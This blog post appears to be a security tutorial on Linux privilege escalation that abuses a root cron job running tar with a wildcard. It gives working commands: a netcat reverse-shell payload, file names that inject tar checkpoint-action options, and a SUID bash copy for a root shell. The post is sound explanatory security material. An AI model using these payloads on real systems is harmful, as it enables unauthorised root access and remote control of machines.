Wednesday, 17 February 2021

***Cron Jobs, tar archives and Wildcards ***

This post is more of a combination of multiple configurations that create the vulnerability. Cron jobs and tar archiving using wild cards.

Cron jobs in Linux are just scheduled tasks. Often times these lead to vulnerabilities as system admins will set a task with super user privileges and forget about it. Most commonly it is done with backup tasks of some kind. For example a shell script owned by root and with write privileges might be being called, thus allowing us to insert a payload that will be executed as root when the cron job runs it. In this scenario I will demonstrate how using tar with wildcards can be leveraged to execute our own malicious payload.

Tar Checkpoints

Tar comes with a little known feature called checkpoints. Checkpoints allow periodic execution of actions at certain points of the archiving process. For example you may have a large backup process that takes a couple of hours and wish to be emailed at certain points in the backup process. This is where you would create a checkpoint that executes a script that emails you after say every 1000th file has been archived.

The Scenario

You have enumerated the system and found a shell script owned by root that is backing up files using a wildcard. You have checked the backup location and monitored the time stamp which you see is updating every 60 seconds. The folder being backed up is writable to you. This is the perfect setup to exploit Tar Checkpoints and gain a root shell. 

Gaining a shell

We need to create three files and place them in the directory being backed up by the cron job. In this case /home/sweps/backups/

1. The payload. I will be using my standard reverse shell:

echo -n "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 4444 >/tmp/f" > /home/sweps/backups/runme.sh

2. The tar checkpoint file: touch /home/sweps/backups/--checkpoint=1

3. The checkpoint action file that executes when the checkpoint is hit: touch /home/sweps/backups/--checkpoint-action=exec=sh\ runme.sh 

Now all we need to do is setup our listener and wait for the cron job to run the backup_files.sh script and it will hit our checkpoint and execute our payload.


A Less Noisy Payload

Being that we are already on the system and just looking to escalate our privileges a less noisy alternative could be to simply copy /bin/bash with the SUID bit set, allowing us to open a separate bash shell locally. The payload for that would be: 
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/sweps/backups/runme.sh

Execute it with /tmp/bash -p




No comments:

Post a Comment